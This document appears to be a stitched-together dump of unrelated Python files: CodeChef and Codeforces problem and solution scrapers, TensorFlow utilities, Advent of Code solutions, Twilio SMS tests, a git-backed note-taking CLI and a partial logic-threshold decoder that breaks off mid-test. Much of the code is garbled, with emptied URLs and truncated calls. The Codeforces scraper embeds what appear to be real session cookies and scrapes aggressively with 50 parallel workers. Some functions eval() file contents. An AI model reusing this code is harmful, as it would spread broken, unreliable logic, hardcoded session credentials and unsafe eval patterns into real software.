escape_lt(html): html_list = list(html) for index in xrange(0, len(html) - 1): if html_list[index] == '<' and html_list[index + 1] == ' ': html_list[index] = '&lt;' return ''.join(html_list) '''TODO: not sure if this one makes sense''' def escape_gt(html): html_list = list(html) for index in xrange(0, len(html) - 1): if html_list[index] == ' ' and html_list[index + 1] == '>': html_list[index + 1] = '&gt;' return ''.join(html_list) def get_problem_list(url): page = requests.get(url) if str(page) == "<Response [503]>": while str(page) == "<Response [503]>": time.sleep(1) page = requests.get(url) html_content = page.text soup = BeautifulSoup(html_content, "html.parser") messages = [] text ="body a") for row in text: message = "" raw = str(row) body ='/submit/(.*)" t', raw) if body != None: w = message = str(w) if message != 'easy' and message != 'medium' and message != 'hard' and message != 'challenge' and message != 'extcontest' and message != 'school': messages.append(message) return messages def get_solution_ids(name, language): if language == 'python': url = '' % (name) url2 = '' % (name) elif language == 'c++': url = '' % (name) url2 = '' % (name) else: pass page1 = requests.get(url) if str(page1) == "<Response [503]>": while str(page1) == "<Response [503]>": time.sleep(1) page1 = requests.get(url) page2 = requests.get(url2) if str(page2) == "<Response [503]>": while str(page2) == "<Response [503]>": time.sleep(1) page2 = requests.get(url2) if"<div align='center' class='pageinfo'>", page1.text) == None: html_content = page1.text else: html_content = page1.text + page2.text messages = [] solution_id = re.findall("href='/viewsolution/(.+?)' target='_blank'>View", html_content) pts = re.findall("/>\\[(.+?)pts\\]<", html_content) if len(pts) != 0 and len(solution_id) != 0: for i in range(len(pts)): if str(pts[i]) == '100' or (float(pts[i]) > .997 and float(pts[i]) < 1.001): messages.append(str(solution_id[i])) elif len(pts) == 0 and len(solution_id) != 0: for i in range(len(solution_id)): messages.append(str(solution_id[i])) else: pass return messages def get_description(i): descriptions = [] left_out = [] failed_to_download_d = [] url = "" + str(i) page = requests.get(url) if str(page) == "<Response [503]>": while str(page) == "<Response [503]>": time.sleep(1) page = requests.get(url) html_content = page.text if'"message":"requests limit exhausted"', html_content) != None: while'message":"requests limit exhausted', html_content) != None: time.sleep(1) page = requests.get(url) html_content = page.text if html_content==None: failed_to_download_d.append(i) if'src="', html_content.replace("\\", "")) == None and'src="/download/extimages', html_content.replace("\\", "")) == None and'"message":"Problem is not visible now. Please try again later."', html_content) == None: first_clean = page.json()['body'].replace("<sup>", "<sup>^").replace(" <=", u" ≤").replace(" >=", u" ≥").replace("<=", u" ≤ ").replace(">=", u" ≥ ").replace(u"≤ ", u"≤ ").replace(u"≥ ", u"≥ ").replace("<h3>", "<h3>\n") keep_lt = escape_lt(first_clean) second_clean = escape_gt(keep_lt) body = BeautifulSoup(second_clean).get_text() w = body w = w.replace("\nAll submissions for this problem are available.", "") w = w.replace("All submissions for this problem are available.", "") w = re.sub('\n Read problems statements in (.+?)\n', '', w, re.M) w = re.sub('\nRead problems statements in (.+?)\n', '', w, re.M) w = re.sub(' Read problems statements in (.+?)\n', '', w, re.M) w = re.sub('Read problems statements in (.+?)\n', '', w, re.M) w = re.sub('Subtask(.+?)Example', 'Example', w, flags=re.M|re.S) w = w.replace("\u003C","<") w = w.replace("\u003E",">") w = w.replace("\\","\\\\") descriptions.append(w.encode('utf-8').decode('string-escape')) else: left_out.append(i) return descriptions, left_out, failed_to_download_d def get_solutions(solution_ids): solutions = {} failed_to_download_s = [] with concurrent.futures.ProcessPoolExecutor(max_workers=50) as executor: future_to_url = {executor.submit(get_solution, i): i for i in solution_ids} for future in concurrent.futures.as_completed(future_to_url): data = future.result() if data[2] == None: solutions[data[0]] = data[1] return solutions def get_solution(solution_id): url = "" + str(solution_id) page = requests.get(url) if str(page) == "<Response [503]>": while str(page) == "<Response [503]>": time.sleep(1) page = requests.get(url) html_content = page.text if html_content==None: failed_to_download_s.append(i) text = BeautifulSoup(html_content, "html.parser").get_text() failed_to_download = None solution = None if len(text)==0 or'var _sf_startpt = (new Date()).getTime()', text) != None: failed_to_download = solution_id else: text = text.replace("\\","\\\\") solution = text.encode('utf-8').decode('string-escape') return solution_id, solution, failed_to_download def download_all_challenge_names(filename): target = open(filename, 'w') problems = get_problem_list("") target.write(str("\neasy\n")) target.write(str(problems)) problems = get_problem_list("") target.write(str("\nmedium\n")) target.write(str(problems)) problems = get_problem_list("") target.write(str("\nhard\n")) target.write(str(problems)) problems = get_problem_list("") target.write(str("\nharder\n")) target.write(str(problems)) problems = get_problem_list("") target.write(str("\nhardest\n")) target.write(str(problems)) problems = get_problem_list("") target.write(str("\nexternal\n")) target.write(str(problems)) def download_descriptions_solutions(filename, index_n): root_dir = 'codechef_data_currently' file = open(filename, 'r') f = open(filename, 'r') index_n_int = int(index_n) start = index_n_int + (500*index_n_int) end = start + 499 easy = [] medium = [] hard = [] harder = [] hardest = [] external = [] g = "" i=0 for line in f: if str(line).find('type=') != -1: body ='type=(.*)', line) g = else: if str(g) == "easy": easy = eval(line) elif str(g) == "medium": medium = eval(line) elif str(g) == "hard": hard = eval(line) elif str(g) == "harder": harder = eval(line) elif str(g) == "hardest": hardest = eval(line) elif str(g) == "external": external = eval(line) else: pass all_names = [] all_names_p = [] all_names =[["easy", easy], ["medium", medium], ["hard", hard], ["harder", harder], ["hardest", hardest], ["external", external]] already_scraped = [] for ndx, n in enumerate(all_names): category = all_names[ndx][0] problem_list = all_names[ndx][1] language = ["python", "c++"] for idx, i in enumerate(problem_list): descriptions, left_out, failed_to_download_d = get_description(i) if i not in left_out: if not os.path.exists(root_dir): os.makedirs(root_dir) cat_dir = root_dir + "/" + category if not os.path.exists(cat_dir): os.makedirs(cat_dir) save_dir = cat_dir + "/" + i if not os.path.exists(save_dir): os.makedirs(save_dir) description_dir = save_dir + "/description" if not os.path.exists(description_dir): os.makedirs(description_dir) description_file_path = description_dir + "/description.txt" description_file = open(description_file_path, 'w') description_file.write(str(descriptions[0])) #''' ids_l = [] for l in language: ids = get_solution_ids(i, l) ids_l.append(ids) solutions = get_solutions(ids) solution_dir = save_dir + "/solutions_" + l if not os.path.exists(solution_dir): os.makedirs(solution_dir) for jdx, j in enumerate(solutions): if len(solutions[j]) < 10000: solution_file_path = solution_dir + "/" + j + ".txt" solution_file = open(solution_file_path, 'w') solution_file.write(solutions[j]) #remove problems with zero solutions if len(ids_l[0]) == 0 and len(ids_l[1]) == 0: shutil.rmtree(save_dir) print("Finished download process") if len(failed_to_download) > 0: print "Following challenges failed to download: " + str(failed_to_download) if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('--index', type=str, default="index", help='') args = parser.parse_args() index_n = args.index download_descriptions_solutions('codechef_problem_names.txt', index_n) ``` #### File: scrapers/codeforces/ ```python from pprint import pprint from bs4 import BeautifulSoup import requests import urllib2 import re ''' info = '' solution = 'view-source:' do not include problems with ''' def get_problem_list(url): page = requests.get(url) if str(page) == "<Response [503]>": while str(page) == "<Response [503]>": time.sleep(1) page = requests.get(url) html_content = page.text soup = BeautifulSoup(html_content, "html.parser") # making soap messages = [] tags = [] problem_and_tags = {} problem_and_tags_array = [] text ="body a") body_problem_prev = None b_p = None for row in text: message = "" raw = str(row) body_problem =' href="/problemset/submit/(.*)">', raw) body_tag =' href="/problemset/tags/(.*)" style', raw) #second_tag ='style="float:right', raw) if body_problem != None: w = message = str(w) b_p = message.replace('/', '_') problem_and_tags[b_p] = tags problem_and_tags_array.append(problem_and_tags) problem_and_tags = {} tags = [] if body_tag != None: w = message = str(w) b_t = message tags.append(b_t) return problem_and_tags_array problem_list = [] for i in range(0,30): a = '' + str(i+1) l = get_problem_list(a) problem_list += l print(problem_list) ''' for k in sorted(problem_list): print k.replace(' ', '_'), problem_list[k] #''' description_file = open("tags.txt", 'w') description_file.write('') for k in problem_list: description_file = open("tags.txt", 'a') description_file.write(str(k) + "\n") ``` #### File: scrapers/codeforces/ ```python import shutil import os import re import requests import urllib2 from pprint import pprint from bs4 import BeautifulSoup import html2text import time import argparse import concurrent.futures def sub_strip(matchobj): return"\u2009", "") def get_problem_list(url): page = requests.get(url) if str(page) == "<Response [503]>": while str(page) == "<Response [503]>": time.sleep(1) page = requests.get(url) html_content = page.text soup = BeautifulSoup(html_content, "html.parser") # making soap messages = [] text ="body a") for row in text: message = "" raw = str(row) body =' href="/problemset/problem/(.*)">', raw) if body != None: w = message = str(w) c = message.split('/') #if message != 'easy' and message != 'medium' and message != 'hard' and message != 'challenge' and message != 'extcontest' and message != 'school': #messages.append(message) messages.append(c) return messages def get_solution_ids(name, language): '''IF IT'S BEEN A LONG TIME SINCE THE LAST TIME YOU USED THIS CODE, YOU NEED TO LOG IN AGAIN AND SEE WHAT CURRENT JSESSIONID AND 39ce7 ARE''' d = {'JSESSIONID': 'FBAAF89D197D7A5C7E95C536A7D31A7A-n1', '39ce7': 'CFtRZMGC'} #d = {'JSESSIONID': '<KEY>', '39ce7': 'CFh6GVF2'} #JSESSIONID=77C3B36AE19BC9CE0B75529825DDB926-n1; 39ce7=CFh6GVF2 url = '' + name[0] + '/problem/' + name[1] c = requests.get(url, cookies = d) m ='meta name="X-Csrf-Token" content="(.*)"', c.text) if not m: raise 'unable to get csrf token' csrf_token = m.groups(1) if language == 'python': #c ="", c =, data = {'csrf_token':csrf_token, 'action':'setupSubmissionFilter', 'frameProblemIndex':'A', 'verdictName':'OK', 'programTypeForInvoker':'python.2', 'comparisonType':'NOT_USED', 'judgedTestCount':'', '_tta':'199'}, headers = {'X-Csrf-Token':csrf_token}, cookies = d ) elif language == 'c++': #c ="", c =, data = {'csrf_token':csrf_token, 'action':'setupSubmissionFilter', 'frameProblemIndex':'A', 'verdictName':'OK', 'programTypeForInvoker':'cpp.g++', 'comparisonType':'NOT_USED', 'judgedTestCount':'', '_tta':'199'}, headers = {'X-Csrf-Token':csrf_token}, cookies = d ) else: pass page = requests.get(url, cookies = d) if str(page) == "<Response [503]>": while str(page) == "<Response [503]>": time.sleep(1) page = requests.get(url) html_content = page.text soup = BeautifulSoup(html_content, "html.parser") # making soap messages = [] text ="body a") for row in text: message = "" raw = str(row) body ='submissionid="(.*)" t', raw) if body != None: w = message = str(w) messages.append(message) return messages def get_description(i): descriptions = [] left_out = [] failed_to_download_d = [] url = '' + str(i[0]) + '/' + str(i[1]) page = requests.get(url) if str(page) == "<Response [503]>": while str(page) == "<Response [503]>": time.sleep(1) page = requests.get(url) html_content = page.text if'"message":"requests limit exhausted"', html_content) != None: while'message":"requests limit exhausted', html_content) != None: time.sleep(1) page = requests.get(url) html_content = page.text if html_content==None: failed_to_download_d.append(i) if'src="', html_content.replace("\\", "")) == None and'src="', html_content.replace("\\", "")) == None and'"message":"Problem is not visible now. Please try again later."', html_content) == None and'Statement is not available', html_content) == None: body = re.findall('</div></div><div>(.+?)<script type="text/javascript">', html_content, flags=re.S) w = body[0] w = w.replace('class="upper-index">', 'class="upper-index">^') '''NEED TO PUT PUT CODE HERE TO REMOVE SPACES IN NEGATIVE EXPONENTS''' w = re.sub('class="upper-index">(.+?)</sup>', sub_strip, w, re.S) w = w.replace("</p>", "\n</p>") w = w.replace("<br", "\n<br") w = w.replace("</div>", "\n</div>") w = w.replace("</center>", "\n</center>") w = BeautifulSoup(w, "html.parser").get_text() w = w.replace("All submissions for this problem are available.", "") w = re.sub('Read problems statements in (.+?)\\\\n', '', w, re.M) w = re.sub('Subtasks(.+?)Example', 'Example', w, re.S) w = w.replace("\u003C","<") w = w.replace("\u003E",">") w = w.replace("\n\n\n\n\n\n","\n\n\n") w = w.replace("\n\n\n\n","\n\n\n") w = w.replace("\\","\\\\") descriptions.append(w.encode('utf-8').decode('string-escape')) else: left_out.append(i) return descriptions, left_out, failed_to_download_d def get_solutions(contest, solution_ids): solutions = {} #failed_to_download_s = [] with concurrent.futures.ProcessPoolExecutor(max_workers=50) as executor: future_to_url = {executor.submit(get_solution, contest, i): i for i in solution_ids} for future in concurrent.futures.as_completed(future_to_url): data = future.result() if data[2] == None: solutions[data[0]] = data[1] return solutions def get_solution(contest, solution_id): url = '' + str(contest[0]) + '/submission/' + str(solution_id) page = requests.get(url) if str(page) == "<Response [503]>": while str(page) == "<Response [503]>": time.sleep(1) page = requests.get(url) html_content = page.text soup = BeautifulSoup(html_content, "html.parser") text ="body > div > div > div > div > pre") failed_to_download = None solution = None if len(text)==0: failed_to_download = solution_id else: body = BeautifulSoup(str(text[0]), "html.parser").get_text() body = body.replace("\\","\\\\") solution = body.encode('utf-8').decode('string-escape') return solution_id, solution, failed_to_download def download_all_challenge_names(filename): target = open(filename, 'w') problem_list = [] for i in range(0,30): a = '' + str(i+1) l = get_problem_list(a) for jdx, j in enumerate(l): if jdx % 2 == 0: problem_list.append(j) target.write(str(problems)) def download_descriptions_solutions(filename, index_n): root_dir = 'codeforces_data' file = open(filename, 'r') f = open(filename, 'r') index_n_int = int(index_n) start = index_n_int + (600*index_n_int) end = start + 599 all_names = [] for line in f: raw = eval(str(line)) a = "" b = "" all_names = raw language = ["python", "c++"] for idx, i in enumerate(all_names): descriptions, left_out, failed_to_download_d = get_description(i) if i not in left_out: if not os.path.exists(root_dir): os.makedirs(root_dir) save_dir = root_dir + "/" + i[0] + "_" + i[1] #''' if not os.path.exists(save_dir): os.makedirs(save_dir) description_dir = save_dir + "/description" if not os.path.exists(description_dir): os.makedirs(description_dir) description_file_path = description_dir + "/description.txt" description_file = open(description_file_path, 'w') description_file.write(descriptions[0]) ids_l = [] for l in language: ids = get_solution_ids(i, l) ids_l.append(ids) solutions = get_solutions(i, ids) solution_dir = save_dir + "/solutions_" + l if not os.path.exists(solution_dir): os.makedirs(solution_dir) for jdx, j in enumerate(solutions): if len(solutions[j]) < 10000: solution_file_path = solution_dir + "/" + j + ".txt" solution_file = open(solution_file_path, 'w') solution_file.write(solutions[j]) if len(ids_l[0]) == 0 and len(ids_l[1]) == 0: shutil.rmtree(save_dir) print("Finished download process") if len(failed_to_download) > 0: print("Following challenges failed to download: " + str(failed_to_download)) parser = argparse.ArgumentParser() parser.add_argument('--index', type=str, default="1", help='') args = parser.parse_args() index_n = args.index ''' download_all_challenge_names('challenges_all.txt') #''' #''' download_descriptions_solutions('challenges_all.txt', index_n) #''' ``` #### File: 0bserver07/neural-engineers-first-attempt/ ```python import numpy as np import tensorflow as tf from tensorflow.python.framework import ops from tensorflow.python.ops import nn_ops, math_ops def get_seq_length(sequence): used = tf.sign(tf.reduce_max(tf.abs(sequence), reduction_indices=2)) length = tf.reduce_sum(used, reduction_indices=1) length = tf.cast(length, tf.int32) return length def get_target_length(sequence): used = tf.sign(sequence) length = tf.reduce_sum(tf.to_float(used), reduction_indices=1) return length '''alrojo''' def sequence_loss_tensor(logits, targets, weights, num_classes, average_across_timesteps=True, softmax_loss_function=None, name=None): """Weighted cross-entropy loss for a sequence of logits (per example). faster? ; 3D tensor logit input; flattens and then multiples in one op; so no for loop """ with ops.name_scope(name, "sequence_loss_by_example", [logits, targets, weights]): probs_flat = tf.reshape(logits, [-1, num_classes]) targets = tf.reshape(targets, [-1]) if softmax_loss_function is None: crossent = nn_ops.sparse_softmax_cross_entropy_with_logits( probs_flat, targets) else: crossent = softmax_loss_function(probs_flat, targets) crossent = crossent * tf.reshape(weights, [-1]) crossent = tf.reduce_sum(crossent) total_size = math_ops.reduce_sum(weights) total_size += 1e-12 # to avoid division by zero crossent /= total_size return crossent def _add_gradient_noise(t, stddev=1e-3, name=None): """Adds gradient noise as described in The input Tensor `t` should be a gradient. The output will be `t` + gaussian noise. 0.001 was said to be a good fixed value for memory networks.""" with tf.op_scope([t, stddev], name, "add_gradient_noise") as name: t = tf.convert_to_tensor(t, name="t") gn = tf.random_normal(tf.shape(t), stddev=stddev) return tf.add(t, gn, name=name) # from def _position_encoding(sentence_size, embedding_size): """Position encoding described in section 4.1 in "End to End Memory Networks" (""" encoding = np.ones((embedding_size, sentence_size), dtype=np.float32) ls = sentence_size + 1 le = embedding_size + 1 for i in range(1, le): for j in range(1, ls): encoding[i - 1, j - 1] = (i - (le - 1) / 2) * (j - (ls - 1) / 2) encoding = 1 + 4 * encoding / embedding_size / sentence_size return np.transpose(encoding) # TODO fix positional encoding so that it varies according to sentence lengths def _xavier_weight_init(): """Xavier initializer for all variables except embeddings as desribed in [1]""" def _xavier_initializer(shape, **kwargs): eps = np.sqrt(6) / np.sqrt(np.sum(shape)) out = tf.random_uniform(shape, minval=-eps, maxval=eps) return out return _xavier_initializer # from # used only for custom attention GRU as TF handles this with the sequence length param for normal RNNs def _last_relevant(output, length): """Finds the output at the end of each input""" batch_size = int(output.get_shape()[0]) max_length = int(output.get_shape()[1]) out_size = int(output.get_shape()[2]) index = tf.range(0, batch_size) * max_length + (length - 1) flat = tf.reshape(output, [-1, out_size]) relevant = tf.gather(flat, index) return relevant # from therne_utils def _get_dims(shape): fan_in = shape[0] if len(shape) == 2 else[:-1]) fan_out = shape[1] if len(shape) == 2 else shape[-1] return fan_in, fan_out # from therne_utils def batch_norm(x, is_training): """ Batch normalization. :param x: Tensor :param is_training: boolean tf.Variable, true indicates training phase :return: batch-normalized tensor """ with tf.variable_scope('BatchNorm'): # calculate dimensions (from tf.contrib.layers.batch_norm) inputs_shape = x.get_shape() axis = list(range(len(inputs_shape) - 1)) param_shape = inputs_shape[-1:] beta = tf.get_variable('beta', param_shape, initializer=tf.constant_initializer(0.)) gamma = tf.get_variable('gamma', param_shape, initializer=tf.constant_initializer(1.)) batch_mean, batch_var = tf.nn.moments(x, axis) ema = tf.train.ExponentialMovingAverage(decay=0.5) def mean_var_with_update(): ema_apply_op = ema.apply([batch_mean, batch_var]) with tf.control_dependencies([ema_apply_op]): return tf.identity(batch_mean), tf.identity(batch_var) mean, var = tf.cond(is_training, mean_var_with_update, lambda: (ema.average(batch_mean), ema.average(batch_var))) normed = tf.nn.batch_normalization(x, mean, var, beta, gamma, 1e-3) return normed ```
{ "source": "0Bu/advent-of-code-2018", "score": 3 }
#### File: 0Bu/advent-of-code-2018/ ```python import re def get_overlapping_claims(rectangles): coordinates = {} for r in rectangles: index, x, y, width, height = [int(a) for a in re.findall(r'\d+', r)] for y_ in range(y, y + height): for x_ in range(x, x + width): if (x_, y_) in coordinates: coordinates[(x_, y_)] += 1 else: coordinates[(x_, y_)] = 1 return sum(v > 1 for v in coordinates.values()) def get_nonoverlapping_claim_ids(rectangles): coordinates = dict() ids = set() for r in rectangles: index, x, y, width, height = [int(a) for a in re.findall(r'\d+', r)] ids.add(index) for y_ in range(y, y + height): for x_ in range(x, x + width): coordinates.setdefault((x_, y_), set()).add(index) for c in coordinates.values(): if len(c) > 1: ids -= c return ids if __name__ == "__main__": lines = [line.strip() for line in open("day03.txt", "r")] print('overlapped claims:', get_overlapping_claims(lines[:])) print('nonoverlapping claim ids:', get_nonoverlapping_claim_ids(lines[:])) ``` #### File: advent-of-code-2018/test/ ```python import unittest import day01 class Part1(unittest.TestCase): def test_get_frequency(self): self.assertEqual(day01.get_frequency([+1, +1, +1]), 3) self.assertEqual(day01.get_frequency([+1, +1, -2]), 0) self.assertEqual(day01.get_frequency([-1, -2, -3]), -6) class Part2(unittest.TestCase): def test_get_dejavu(self): self.assertEqual(day01.get_dejavu([+1, -1]), 0) self.assertEqual(day01.get_dejavu([+3, +3, +4, -2, -4]), 10) self.assertEqual(day01.get_dejavu([-6, +3, +8, +5, -6]), 5) self.assertEqual(day01.get_dejavu([+7, +7, -2, -7, -4]), 14) ```
{ "source": "0c370t/land_acknowledgement", "score": 3 }
#### File: src/tests/ ```python from unittest.mock import patch import pytest from falcon import testing from app.web import create_app from xml.dom import minidom def get_message_from_xml(xml_string): '''Just a little help to deal with twilio's xml format''' xmldoc = minidom.parseString(xml_string) itemlist = xmldoc.getElementsByTagName('Message') return itemlist[0] @pytest.fixture() def client(): return testing.TestClient(create_app()) @patch('app.web.GeoData.query_location') def test_unknown_location(query_location, client): '''It should respond with help text when location can't be found''' query_location.return_value = None result = client.simulate_post('/', params={'Body': "Sometown, ak"}) assert get_message_from_xml(result.text) == 'I could not find the location: Sometown, ak' @patch('app.web.GeoData.query_location') @patch('app.web.GeoData.native_land_from_point') def test_unfound_acknowledgement(from_point, query_location, client): '''It should respond with help text when there's no native land for a point''' query_location.return_value = {'city': 'Paris', 'state': 'France', 'latitude': 45.928, 'longitude': -67.56} from_point.return_value = [] result = client.simulate_post('/', params={'Body': "Paris, France"}) assert get_message_from_xml(result.text) == 'Sorry, I could not find anything about Paris, France.' @patch('app.web.GeoData.query_location') @patch('app.web.GeoData.native_land_from_point') def test_single_result(from_point, query_location, client): '''It should respond with a single result when there's only one''' query_location.return_value = {'city': 'Adacao', 'state': 'Guam', 'latitude': 45.928, 'longitude': -67.56} from_point.return_value = [{'name': 'Chamorro'}] result = client.simulate_post('/', params={'Body': "Adacao, gu"}) assert get_message_from_xml(result.text) == 'In Adacao, Guam you are on Chamorro land.' @patch('app.web.GeoData.query_location') @patch('app.web.GeoData.native_land_from_point') def test_two_results(from_point, query_location, client): '''It should respond with a two results when there's two results''' query_location.return_value = {'city': 'Portland', 'state': 'Oregon', 'latitude': 45.928, 'longitude': -67.56} from_point.return_value = [{'name': 'Cowlitz'}, {'name': 'Clackamas'}] result = client.simulate_post('/', params={'Body': "Portland, or"}) assert get_message_from_xml(result.text) == 'In Portland, Oregon you are on Cowlitz and Clackamas land.' @patch('app.web.GeoData.query_location') @patch('app.web.GeoData.native_land_from_point') def test_multiple_results(from_point, query_location, client): '''It prefers the Oxford comma''' query_location.return_value = {'city': 'Seattle', 'state': 'Washington', 'latitude': 45.928, 'longitude': -67.56} from_point.return_value = [{'name': 'Duwamish'}, {'name': 'Coast Salish'}, {'name': 'Suquamish'}] result = client.simulate_post('/', params={'Body': "Seattle, wa"}) assert get_message_from_xml(result.text) == 'In Seattle, Washington you are on Duwamish, Coast Salish, and Suquamish land.' # noqa E501 ```
{ "source": "0c4t/zetta", "score": 3 }
#### File: zetta/zetta/ ```python import os import sys import datetime import argparse import shutil from subprocess import call from git import Repo from git import GitCommandError from git import InvalidGitRepositoryError def parse_args(): parser = argparse.ArgumentParser( description="A Tool for managing a \"box of notes\"") subparsers = parser.add_subparsers(dest="action") search_parser = subparsers.add_parser("search", help="search through notes") search_parser.add_argument("pattern", type=str, help="pattern to search in notes for") edit_parser = subparsers.add_parser("edit", help="edit note by id") edit_parser.add_argument("id", help="note id") create_parser = subparsers.add_parser("create", help="create new note") create_parser.add_argument("-t", "--title", type=str, default="# ", dest="title", help="desired title") delete_parser = subparsers.add_parser("delete", help="delete note by id") delete_parser.add_argument("id", help="note id") return parser.parse_args() def main(): args = parse_args() try: global PATH_TO_REPO PATH_TO_REPO = os.environ["ZETTA_BOX"] except KeyError as e: sys.stderr.write("Error: please set ZETTA_BOX environment variable\nto path to git repo to store notes in!\n\n") return -1 if not (os.path.exists(PATH_TO_REPO) and os.path.isdir(PATH_TO_REPO)): sys.stderr.write("Error: path to repo is invalid!\n\n") return -1 global REPO try: REPO = Repo(PATH_TO_REPO) except InvalidGitRepositoryError as e: sys.stderr.write("Error: path in ZETTA_BOX is a valid path to dir, but there isn't a git repo in it\n\n") return -1 actions = { "search": search, "edit": edit, "create": create, "delete": delete } if args.action in actions.keys(): action = actions[args.action] if callable(action): action(args) def search(args): pattern_lower = args.pattern.lower() notes = os.listdir(PATH_TO_REPO)[1:] for note_name in notes: path = f'{PATH_TO_REPO}{note_name}' path_to_note_file = f"{path}/" with open(path_to_note_file, 'r') as note_file: title = note_file.readline() if "\n" in title: title = title[:-1] if "#" in title: title = title[1:] title = title.strip() while True: line = note_file.readline() line = line.lower() if not line: break if pattern_lower in line: print(note_name + ": " + title) break def edit(args): note_name = if not note_name.isnumeric(): sys.stderr.write("\nError: note id should be numeric\n\n") return -1 editor = os.environ.get("EDITOR") if os.environ.get("EDITOR") else "vi" path = f'{PATH_TO_REPO}{os.path.sep}{note_name}' path_to_note_file = f"{path}/" call([editor, path_to_note_file]) with open(path_to_note_file, "r") as note_file: commit_message = note_name + ": " + note_file.readline() commit = input("commit? (y/n): ") while (commit != "y") and (commit != "n"): commit = input("enter either \"y\" or \"n\": ")\ if (commit == "y"): git = REPO.git git.add(path_to_note_file) try: git.commit(m=commit_message) except GitCommandError as e: print("Nothing to commit :(\n") def create(args): title = str(args.title) editor = os.environ.get("EDITOR") if os.environ.get("EDITOR") else "vi" note_name ="%Y%m%d%H%M%S") path = f'{PATH_TO_REPO}{os.path.sep}{note_name}' os.mkdir(path) path_to_note_file = f"{path}/" with open(path_to_note_file, "w") as note_file: note_file.write(title) note_file.flush() call([editor, path_to_note_file]) note_file = open(path_to_note_file, "r") commit_message = note_name + ": " + note_file.readline() print(note_name) commit = input("commit? (y/n): ") while (commit != "y") and (commit != "n"): commit = input("enter either \"y\" or \"n\": ")\ if (commit == "y"): git = REPO.git git.add(path_to_note_file) git.commit(m=commit_message) def delete(args): note_name = path = f'{PATH_TO_REPO}{os.path.sep}{note_name}' path_to_note_file = f"{path}/" try: with open(path_to_note_file, "r") as note_file: note_title = note_file.readline() except FileNotFoundError as e: sys.stderr.write("\nError: note with given name does not exist :(\n\n") return do_deletion = input(f"{note_name}: {note_title}\ndelete? (y/n): ") if (do_deletion != "y"): print("deletion canceled!") return shutil.rmtree(path) commit_message = "deleted " + note_name print(f"deleted {note_name} ({note_title})") commit = input("commit? (y/n): ") while (commit != "y") and (commit != "n"): commit = input("enter either \"y\" or \"n\": ")\ if (commit == "y"): try: git = REPO.git git.add(path_to_note_file) git.commit(m=commit_message) except GitCommandError as e: sys.stderr.write("\nWarning: could not commit note deletion (was not committed on creation?)\n\n") if __name__ == "__main__": exit(main()) ```
{ "source": "0caliber/tds3012b", "score": 2 }
#### File: 0caliber/tds3012b/ ```python import unittest ############################################################################################### # Main Bus Class Decode Functions ############################################################################################### class BusDecode: def __init__(self): print('Bus Decode') self.LevelLo = 0.7 self.LevelHi = 2.7 self.EdgeDuration = 0 # used to determine sample scale for edge detection self.PulseDurationLo = 0 self.PulseDurationHi = 0 self.bitlen = 1 # Comm defaults def f_Threshold(self, rawdata): dataout = [] for mydata in rawdata: if mydata >= self.LevelHi: mydigit = 1 elif mydata <= self.LevelLo: mydigit = 0 else: mydigit = 2 dataout.append(mydigit) return dataout pass def f_FindClkDuration(self, thrdata): low = 0 hi = 0 lowmax = 0 himax = 0 state = 0 for mydata in thrdata: if mydata == 0: low += 1 lowmax = max(lowmax, low) elif mydata == 1: hi += 1 himax = max(himax, hi) if state == 0: if mydata == 1: low = 0 state = 1 elif state == 1: if mydata == 0: hi = 0 state = 0 self.PulseDurationLo = lowmax self.PulseDurationHi = himax pass def f_FindEdges(self, thrdata): state = 0 cnt = 0 dataout = [] newdigit = 0 mydigit = 0 for mydata in thrdata: if state == 0: if mydata == 1: mydigit = 1 state = 1 elif mydata == 0: mydigit = 0 state = 0 else: # mydata == 2: state = 2 mydigit = 0 newdigit = 1 elif state == 1: if mydata == 1: mydigit = 0 state = 1 elif mydata == 0: mydigit = -1 state = 0 else: # mydata == 2: state = 2 mydigit = 0 newdigit = -1 else: if mydata == 1: mydigit = newdigit state = 1 cnt = 0 elif mydata == 0: mydigit = newdigit state = 0 cnt = 0 else: mydigit = 0 pass dataout.append(mydigit) return dataout pass def f_DecodeData(self, rawdata): pass def f_SetThresholdHi(self, LevelHi): self.LevelHi = LevelHi pass def f_SetThresholdLo(self, LevelLo): self.LevelLo = LevelLo pass def f_SetThresholdType(self, std_type): try: (self.LevelLo, self.LevelHi) = { "CMOS" : (1.5, 3.5), "LVCMOS" : (1, 2.3), "TTL" : (0.7, 2.4), "LVTTL" : (0.3, 2), "RS422U" : (1.7, 2.5) }[std_type] except: print ('Unknown standard, ', std_type) def f_SetEdgeTimeSamples(self, edgesamples): self.EdgeDuration = edgesamples ############################################################################################### # TDD Unit Test Class and functions ############################################################################################### class test_basic(unittest.TestCase): # Test Attribute control def test_ThesholdTypeCMOSHi(self): x=BusDecode() x.f_SetThresholdType('CMOS') self.assertEqual(3.5, x.LevelHi) def test_ThesholdTypeCMOSLo(self): x=BusDecode() x.f_SetThresholdType('CMOS') self.assertEqual(1.5, x.LevelLo) def test_ThesholdTypeLVCMOSHi(self): x=BusDecode() x.f_SetThresholdType('LVCMOS') self.assertEqual(2.3, x.LevelHi) def test_ThesholdTypeLVCMOSLo(self): x=BusDecode() x.f_SetThresholdType('LVCMOS') self.assertEqual(1, x.LevelLo) def test_ThesholdTypeTTLHi(self): x=BusDecode() x.f_SetThresholdType('TTL') self.assertEqual(2.4, x.LevelHi) def test_ThesholdTypeTTLLo(self): x=BusDecode() x.f_SetThresholdType('TTL') self.assertEqual(0.7, x.LevelLo) def test_ThesholdTypeLVTTLHi(self): x=BusDecode() x.f_SetThresholdType('LVTTL') self.assertEqual(2, x.LevelHi) def test_ThesholdTypeLVTTLLo(self): x=BusDecode() x.f_SetThresholdType('LVTTL') self.assertEqual(0.3, x.LevelLo) def test_SetThresholdHi(self): x=BusDecode() x.f_SetThresholdHi(1.2) self.assertEqual(1.2, x.LevelHi) def test_SetThresholdLo(self): x=BusDecode() x.f_SetThresholdLo(1) self.assertEqual(1, x.LevelLo) def test_SetEdgeTimeSamples(self): x=BusDecode() x.f_SetEdgeTimeSamples(1) self.assertEqual(1, x.EdgeDuration) # Test Threshold to Logic Function of RAW data def test_ThresholdLVCMOS(self): datain = [0.2, 0.2, 0.3, 0.7, 0.9, 1.0, 1.2, 1.3, 1.7, 1.9, 2.2, 2.7, 2.8, 2.8, 2.8 ] x=BusDecode() x.f_SetThresholdType('LVCMOS') dataout = x.f_Threshold(datain) dataref = [0, 0, 0, 0, 0, 0, 2, 2, 2, 2, 2, 1, 1, 1, 1 ] self.assertEqual(dataref, dataout) def test_ThresholdLVTTL(self): datain = [0.2, 0.2, 0.3, 0.7, 0.9, 1.0, 1.2, 1.3, 1.7, 1.9, 2.2, 2.7, 2.8, 